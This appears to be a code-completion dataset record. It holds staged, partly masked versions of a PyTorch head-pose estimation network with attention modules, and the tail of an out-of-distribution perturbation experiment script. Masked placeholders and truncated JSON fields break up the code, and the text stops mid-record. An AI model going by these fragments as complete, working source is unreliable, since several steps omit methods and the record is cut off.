-------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being used for this experiment.')\n parser.add_argument('--result_dir', type=str, default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-5": "\"\"\"\nTest the OOD-detection capabilities of models by scaling a random feature for all sample in the data set.\n\"\"\"\n\n# STD\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport argparse\nfrom typing import Tuple, Dict, List\n\n# EXT\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\n\n# PROJECT\nfrom uncertainty_estimation.utils.model_init import AVAILABLE_MODELS\nfrom uncertainty_estimation.utils.model_init import init_models\nfrom uncertainty_estimation.utils.datahandler import DataHandler\nfrom uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer\n\n# CONST\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = \"../../data/results\"\n\n\ndef run_perturbation_experiment(\n nov_an: NoveltyAnalyzer, X_test: np.ndarray, scoring_func: str = None\n) -> Tuple[Dict[str, List[float]], Dict[str, List[float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(\n np.arange(0, X_test.shape[1]), N_FEATURES, replace=False\n )\n\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n\n return aucs_dict, recall_dict\n\n\nif __name__ == \"__main__\":\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_origin\", type=str, default=\"MIMIC\", help=\"Which data to use\"\n )\n parser.add_argument(\n \"--models\",\n type=str,\n nargs=\"+\",\n default=AVAILABLE_MODELS,\n choices=AVAILABLE_MODELS,\n help=\"Determine the models which are being used for this experiment.\",\n )\n parser.add_argument(\n \"--result_dir\",\n type=str,\n default=RESULT_DIR,\n help=\"Define the directory that results should be saved to.\",\n )\n args = parser.parse_args()\n\n # Loading the data\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n\n for ne, scoring_funcs, name in init_models(\n input_dim=len(feature_names), selection=args.models, origin=args.data_origin\n ):\n print(name)\n nov_an = NoveltyAnalyzer(\n ne,\n train_data[feature_names].values,\n test_data[feature_names].values,\n val_data[feature_names].values,\n train_data[y_name].values,\n test_data[y_name].values,\n val_data[y_name].values,\n )\n nov_an.train()\n\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(\n nov_an, test_data[feature_names], scoring_func=scoring_func\n )\n\n dir_name = os.path.join(\n args.result_dir,\n args.data_origin,\n \"perturbation\",\n name,\n \"detection\",\n scoring_func,\n )\n\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n with open(os.path.join(dir_name, \"recall.pkl\"), \"wb\") as f:\n pickle.dump(recall_dict, f)\n\n with open(os.path.join(dir_name, \"detect_auc.pkl\"), \"wb\") as f:\n pickle.dump(aucs_dict, f)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
<|reserved_special_token_0|>
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChannelAttention(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChannelAttention(nn.Module):
<|reserved_special_token_0|>
def forward(self, x):
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1,
bias=False), nn.ReLU(inplace=True), nn.Conv2d(in_planes // 16,
in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(in_planes // 16, in_planes, 1, bias=False))
#self.fc = nn.Sequential(nn.Linear(in_planes, in_planes // 16, bias=False),
# nn.ReLU(inplace=True),
# nn.Linear(in_planes // 16, in_planes, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
#b, c, _, _ = x.size()
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size//2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self,inplanes,downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
)
def forward(self, x):
#residual =x
x = self.ca(x) * x
#x += residual
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num=1792#2304#2048#1536#1408#1280#1792
self.cls_num=66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0,self.cls_num-1)*1).cuda()
self.fc_b_1 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.fc_b_2 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.fc_b_3 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.max_pool_1=nn.MaxPool1d(3)
self.max_pool_2=nn.MaxPool1d(3)
self.max_pool_3=nn.MaxPool1d(3)
self.softmax=nn.Softmax(dim=2).cuda()
self.sigmoid=nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat=torch.unsqueeze(x_p,1)
x_y_feat=torch.unsqueeze(x_y,1)
x_r_feat=torch.unsqueeze(x_r,1)
x_feat=torch.cat([x_p_feat,x_y_feat,x_r_feat],1)
x_p_b=self.fc_b_1(x_p)
x_y_b=self.fc_b_2(x_y)
x_r_b=self.fc_b_3(x_r)
x_p_b=torch.unsqueeze(x_p_b,1)
x_y_b=torch.unsqueeze(x_y_b,1)
x_r_b=torch.unsqueeze(x_r_b,1)
x_p_b_mp=self.max_pool_1(x_p_b)
x_y_b_mp=self.max_pool_2(x_y_b)
x_r_b_mp=self.max_pool_3(x_r_b)
x_p_pre=self.softmax(x_p_b)
x_y_pre=self.softmax(x_y_b)
x_r_pre=self.softmax(x_r_b)
x_p=torch.sum(x_p_pre * self.idx_tensor, 2)
x_y=torch.sum(x_y_pre * self.idx_tensor, 2)
x_r=torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p,x_y,x_r],1),torch.cat([x_p_b,x_y_b,x_r_b],1),torch.cat([x_p_b_mp,x_y_b_mp,x_r_b_mp],1),x_feat
|
flexible
|
{
"blob_id": "c9de51ee5a9955f36ecd9f5d92813821fb68fb3d",
"index": 4308,
"step-1": "<mask token>\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n <mask token>\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-2": "<mask token>\n\n\nclass ChannelAttention(nn.Module):\n <mask token>\n <mask token>\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), 